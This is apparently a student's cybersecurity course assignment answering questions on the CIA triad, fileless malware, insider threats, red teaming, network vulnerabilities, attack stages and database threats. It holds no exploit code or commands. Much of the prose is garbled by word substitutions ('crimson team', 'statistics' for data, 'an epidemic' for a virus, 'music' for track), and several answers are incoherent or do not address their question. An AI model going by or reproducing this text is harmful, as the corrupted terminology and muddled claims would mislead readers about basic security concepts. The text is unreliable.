Com508 Assignment1
Com508 Assignment1
Com508 Assignment1
CHAPTER- 1
1Q: Define the primary elements of the CIA triad in your own words. Are
three areas of emphasis in this model comprehensive of modern threats to a
software system with examples?
Ans: Confidentiality, Integrity, and Availability These are the three core additives
of the CIA triad, an facts protection version meant to manual an agency’s safety
processes and policies. This version is also on occasion called the AIC triad
(availability, integrity, and confidentiality) to avoid confusion with the Central
Intelligence Agency. The CIA triad is widely well-known as a model in statistics
security.
Confidentiality: Confidentiality in software means that the private and touchy
information dealt with via the utility can not be studied using all and sundry who is
explicitly authorized to view it. For instance, When you log in, you’ve requested a
password. If it’s been a while seeing that your last log-in, you'll be asked to enter a
code that’s been dispatched to you or a few different forms of two-issue
authentication.
Integrity: Integrity manner that the records processed by way of an application are
not changed through any unauthorized channels or any unauthorized men and
women. This may be a challenge in stand-alone programs in addition to networked
packages i.e., It ought to be maintained in a correct country, kept so that it can now
not be tampered with, and ought to be accurate, proper, and reliable. Example The
ATM and bank software put into effect records integrity by making sure that any
transfers or withdrawals made thru the system are meditated inside the accounting
for the user's financial institution account
Availability: Availability speaks to the system’s potential to stay operational even
in the face of failure or attack. It's miles critical that unauthorized users are saved
out of a business enterprise’s records, facts need to be had to authorized customers
every time they require it. This approach keeps structures, networks, and devices
up and going for walks. For Example, You can log into your account on every
occasion you want, and you can even be able to contact customer service at any
time of the day or night.
2Q . Of the different automated attack tools and malicious software threats,
which do you see as the most significant threat? Consider the scope of the
distribution as well as the potential to exploit specific targets in your
evaluation.
Ans: Out of different attack tools and malicious software threats I see fileless
malware, Unlike traditional malware, which uses executable files to infect devices,
fileless malware doesn't directly impact files or the file system. Instead, this type of
malware uses non-file objects like Microsoft Office macros, PowerShell, WMI,
and other system tools. A notable example of a fileless malware attack
was Operation Cobalt Kitty, in which the Ocean Lotus Group infiltrated several
corporations and conducted nearly six months of stealthy operations before being
detected. Because there's no executable file, it is difficult for antivirus software to
protect against file-less malware. To defend against it, make sure that users only
have the rights and privileges they need to do their jobs. This will help prevent
cybercriminals from leveraging fileless malware to gain employee credentials and
access restricted data. In addition, disable Windows programs like PowerShell for
users who don't need it. fileless malware can do anything that “regular” malware
can do, but for practical reasons, you will often see that there is a limited amount
of malicious, fileless code. For more complex programs like ransomware, the
fileless malware might act as a dropper, which means the first stage downloads and
executes the bigger program which is the actual payload. And, of course, fileless
malware can use native, legitimate tools built into a system during a cyberattack.
The most common use cases for fileless malware are:
Initial access. The first step of a cyberattack is to gain a foothold on a
system. This can be stealing credentials or exploiting a vulnerability in an
access point.
Harvest credentials. Fileless malware is sometimes used to hunt for
credentials, so an attacker can use alternative entry points or elevate their
privileges,
Persistence. To ensure they have permanent access to a compromised
system, an attacker might use fileless malware to create a backdoor.
Data exfiltration. An attacker might use fileless malware to hunt for useful
information, such as a victim’s network configuration.
Dropper and/or payload. A dropper downloads and starts other malware
(the payload) on a compromised system. The payload may come as a file, or
it can be read from a remote server and loaded into memory directly.
3Q. Which do you see as more destructive the unwriting insider who compiles
with an attack or the unintentional external attacker who is trying to break the
system’s defenses? Consider system access and the likelihood of success and
repetition in your evaluation.
Ans. An insider chance is a vulnerability danger that originates from inside the
affected enterprise, in step with a clear description. The root of the trouble
would be a person with sufficient internal information about the commercial
enterprise to cause damage. This isn't to say that the hazard is being made
through a modern employee or officer of the agency. The trouble can be
resulting from a consultant, enterprise associate, retired employee, or board
member. Internal actors are complicit in 34% of information breaches, in step
with the 2019 Verizon Data Breach Investigation Report. According to the
ballot, all workers had to get entry to 17% of an organization's labeled files.
Insider threats have the intelligence, incentive, and authority to steal touchy
enterprise records, in step with these statistics. It is the CISO's job to preserve
the company's security from certain dangers. Someone with specialized know-
how of and/or who gets the right of entry to a corporation's categorized facts,
information technology, or community sources is taken into consideration as an
insider hazard. Learning approximately them and the dangers they pose will
save you numerous heartaches. The maximum full-size gain is that it protects
the business against identification manipulation and the effects of a statistics
breach. The cost of any capacity breach-related remediation is therefore
decreased for an insider attempt. Another benefit of using this software is that it
can be used to music current personnel, contractors, suppliers, or colleagues
allowing you to recognize the organization's most enormous threats.
4Q: What are the benefits and risks of using an external Red team to
attack your software system for design flaws and vulnerabilities? What are
the three issues that would help decide on whether or not to employ this
tactic?
Ans: Red teaming is a step above traditional penetration (pen) checking out
with the aid of simulating actual-global assaults by using replicating the
Techniques, Tactics, and Procedures (TTP) of real-global adversaries. A
crimson teaming engagement differs from conventional pen checking out as it's
far executed from as close to a zero expertise perspective as feasible, which
means the enterprise as a whole isn't notified in advance of time, nor is the red
team provided with any pre-needful facts up-front. The position of the crimson
team (which is often unbiased from the agency, but can also be an internal
team) is to simulate an assault on the target company, whereas the blue team
(generally an inner safety team, but maybe outsourced) has to defend the
company from infiltration in opposition to the simulated attack.
Benefits: Implementing a red team approach permits organizations to actively
check their present cyber defenses and capabilities in a low-risk environment.
By enticing these two agencies, it's far viable to constantly evolve the business
enterprise’s security approach based on the agency’s unique weaknesses and
vulnerabilities, in addition to the ultra-modern actual-global attack strategies.
1. Identify misconfigurations and coverage gaps in existing protection products
2. Strengthen community protection to come across centered attacks and
enhance breakout time
3. Raise healthy opposition among protection employees and foster
cooperation between the various IT and protection groups
4. Elevate cognizance amongst staff as to the threat of human vulnerabilities
which may also compromise the company’s protection
5. Build the skills and adulthood of the corporation’s protection talents inside a
safe, low-chance education environment.
6Q. Why is controlling the misbehavior of software as important as
software behaving as expected during execution?
Ans: Making a software program changed into at the start an honest optimistic
exercise – in which you knew what you desired to construct, and labored on
building it. With the quantity of power generation now wields, the arena and its
monies experience on a community and the software at the cease of it. And
software isn't pretty much “making it work”, but also about “making it not
damage”. It isn't only a protective method of coding, but a paradigm shift in
mindset on how we view a software program system. Test cases and use cases
are built into the requirement amassing segment and software program needs to
be developed to fail effectively. Each line of code ought to best do what it is
supposed to, and no more. And every module wishes to be enveloped with
exception handlers and catch-alls. As lives and structures are increasingly more
digitalized, hacking is not a sport played by inaccurate young adults. It is
organized crime. Cybercriminals paintings around the clock to discover
vulnerabilities, backdoors, exploitable loopholes, and any chink within the
software armor. Heartland Payment Systems, a fee processing company, had an
internet site that turned into coded to do what it must. Help customers and
customers interact with it easily manner their online transactions.
CHAPTER- 2
1Q. In a networked software system, what are the most vulnerable system
components that would be a primary target? Assume a general application
as the basis of your analysis.
Ans: A community vulnerability is a weakness or flaw in software programs,
hardware, or organizational techniques, which while compromised via a threat,
can bring about a safety breach. Nonphysical community vulnerabilities usually
involve software or data. For instance, a working system (OS) is probably prone
to community attacks if it’s now not updated with modern-day protection
patches. If left unpatched an epidemic could infect the OS, the host that it’s
located on, and potentially the entire network. Physical community
vulnerabilities contain the bodily safety of an asset consisting of locking a
server in a rack closet or securing an entry point with a turnstile.
Network vulnerabilities are available in many paperwork however the
maximum not unusual sorts are:
Malware is quick for malicious software, including Trojans, viruses, and worms
which are mounted on a person’s gadget or a bunch server.
Social engineering attacks fool users into giving up non-public statistics along
with a username or password.
Outdated or unpatched software program that exposes the systems walking the
software and potentially the entire network.
Misconfigured firewalls / operating structures that allow or have default rules
enabled.
Out of all the Malware (Malicious Software) would be the primary target
Malware is malicious software this is unknowingly bought, downloaded, or
hooked up. Systems inflamed with malware will present with signs and
symptoms consisting of walking slower, sending emails without consumer
movement, randomly rebooting, or beginning unknown methods.
The most common kinds of malware encompass:
Viruses
Keyloggers
Worms
Trojans
Ransomware
Logic Bombs
Bots/Botnets
Adware & Spyware
Rootkits
Malware is often deployed thru phishing emails. Quick, dangerous actors ship
emails to employees containing hyperlinks to websites or embed attachments
within the electronic mail itself. If a movement is taken, together with clicking
the hyperlink or downloading the attachment, the malicious code is completed
and you could keep in mind your self-breached.
4Q: Are all software system attacks targeted at gaining information or
access to information? Justify your position on this.
Ans: Regardless of whether or not an attack is centered or un-centered, or the
attacker is the usage of a commodity or bespoke tools, cyber-attacks have some
stages that are not unusual. An attack, particularly if it's miles performed
through a continual adversary, can also consist of repeated ranges. The attacker
is efficiently probing your defenses for weaknesses that, if exploitable, will take
them closer to their ultimate purpose. Understanding these ranges will assist
you in better protecting yourself.
We have followed a simplified version of the Cyber Kill Chain (produced via
Lockheed Martin) to explain the four primary ranges present in maximum cyber
attacks:
Survey - investigating and analyzing available facts about the target so one can
perceive capacity vulnerabilities
Delivery - getting to the factor in a device in which a vulnerability can be
exploited
Breach - exploiting the vulnerability/vulnerabilities to advantage a few shapes
of unauthorized get right of entry to
Affect - wearing out sports within a machine that achieves the attacker’s
intention
3Q: What are the primary threats to a database system? What mitigation
techniques are available to help protect data from a database at rest?
Ans: The threats diagnosed over the past couple of years are identical that
maintain to plague companies nowadays, consistent with Gerhart. The
maximum not unusual database threats encompass:
*Excessive privileges. When people are granted default database privileges that
exceed the necessities of their activity features, those privileges can be abused,
Gerhart stated. “For instance, a financial institution worker whose task requires
the ability to exchange handiest account holder contact data can also take
benefit of excessive database privileges and growth the account balance of a
colleague’s financial savings account.” Further, some businesses fail to update
get admission to privileges for employees who change roles inside a business
enterprise or go away altogether.
*Legitimate privilege abuse. Users can also abuse legitimate database privileges
for unauthorized purposes, Gerhart said.
*Database injection attacks. The important sorts of database injection assaults
are SQL injections that focus on conventional database structures and NoSQL
injections that concentrate on “large information” systems. “An important
factor to recognize right here is that, although it is technically true that large
records solutions are impervious to SQL injection assaults due to the fact they
don’t use any SQL-based technology, they are, in fact, nevertheless at risk of
the identical fundamental magnificence of assault,” Gerhart said. “In each kind,
a success input injection assault can supply an attacker unrestricted access to a
whole database.”
*Malware. A perennial threat, malware is used to steal sensitive statistics
through legitimate customers using infected gadgets.
*Storage media publicity. Backup garage media is frequently absolutely
unprotected from assault, Gerhart stated. “As a result, numerous safety breaches
have involved the robbery of database backup disks and tapes. Furthermore,
failure to audit and reveal the sports of directors who've low-stage access to
sensitive information can position your statistics at risk. Taking the precise
measures to shield backup copies of touchy facts and display your maximum
incredibly privileged users is not most effective an information security great
practice, but also mandated using many regulations,” he said.